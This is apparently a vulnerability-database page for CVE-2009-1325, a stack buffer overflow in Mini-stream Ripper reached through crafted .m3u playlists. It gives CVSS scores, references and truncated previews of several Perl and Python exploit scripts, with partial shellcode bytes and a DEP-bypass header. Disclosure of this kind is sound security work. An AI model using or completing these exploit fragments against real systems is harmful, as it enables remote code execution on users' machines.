Published: 17/04/2009 Updated: 29/09/2017

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 965

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Stack-based buffer overflow in Mini-stream Ripper 3.0.1.1 allows remote malicious users to execute arbitrary code via a long URI in a playlist (.m3u) file.

Vulnerable Product	Search on Vulmon	Subscribe to Product
mini-stream ripper 3.0.1.1

#!/usr/bin/perl # Mini-stream Ripper Version 3011 m3u Universal Stack Overflow Exploit # Disoverd By Cyber-Zone # Exploited By Stack my $Header = "#EXTM3U\n"; my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x ...

#!/usr/bin/perl # # # ************************************************************************ # * ASX to MP3 Converter (M3U File) Local Stack Overflow POC * # ************************************************************************ # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYC ...

#!/usr/bin/perl # # # ************************************************************* # * WM Downloader (M3U File) Local Stack Overflow POC * # ************************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz ...

#!/usr/bin/perl # # # ********************************************************* # * RM Downloader (M3U File) Local Stack Overflow POC * # ********************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz : Hussin X ...

#!/usr/bin/perl # # # ************************************************************************ # * Mini-stream RM-MP3 Converter (M3U File) Local Stack Overflow POC * # ************************************************************************ # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYC ...

# written to bypass OptIn/OptOut DEP policy # tested on windows xp sp3 running in virtualbox import sys print "\n============================" print "Mini-Stream 297 DEP Bypass" print " Written by Blake " print " Tested on Windows XP SP3 " print "============================\n" # calcexe shellcode =( "\xeb\x03\x59\xeb\x05\xe8\xf8\ ...

#!/usr/bin/perl # # # ************************************************************* # * Mini-stream Ripper (M3U File) Local Stack Overflow POC * # ************************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz ...

CWE-119 http://secunia.com/advisories/34692 http://www.securityfocus.com/bid/34494 https://exchange.xforce.ibmcloud.com/vulnerabilities/49844 https://www.exploit-db.com/exploits/8416 https://www.exploit-db.com/exploits/8402 https://nvd.nist.gov https://www.exploit-db.com/exploits/8416/

Get Started

CVE-2009-1325

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect